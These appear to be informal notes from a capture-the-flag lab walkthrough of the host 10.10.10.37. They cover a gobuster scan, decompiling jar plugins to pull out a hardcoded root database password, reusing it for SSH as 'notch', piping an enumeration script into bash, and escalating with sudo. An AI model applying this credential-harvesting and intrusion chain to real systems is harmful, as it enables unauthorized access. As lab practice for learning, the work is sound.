failed to get anon login on ftp

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.37
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/07/18 10:56:16 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 301) -nothing
/javascript (Status: 301) -nothing forbidden
/phpmyadmin (Status: 301) - login 
/plugins (Status: 301) - jar files
/server-status (Status: 403)
/wiki (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
===============================================================
2019/07/18 10:57:19 Finished
===============================================================

download  the jar files
unzip the jar
decompiled with jad

public BlockyCore()
    {
        sqlHost = "localhost";
        sqlUser = "root";
        sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    }

on first landing webpage user is there notch

ssh notch@10.10.10.37
8YsqfCTnvxAUeduzjNSXe22

her;s the user ran lineum

curl lienum.sh|bash

ps -ef | grep 1282

minecraft is running as root or notch is part of sudo

sudo -i

root


phymyadmin same password created your own

php -a
Interactive mode enabled

php > echo password_hash['sid', PASSWORD_DEFAULT];
PHP Parse error:  syntax error, unexpected ',', expecting ']' in php shell code on line 1
php > echo password_hash('sid', PASSWORD_DEFAULT);
$2y$10$NQaqtO6fCb2b.D2YPpfYguYOfRhxuOIcFCAOamyqygs8CzIfi1aFS
php > 

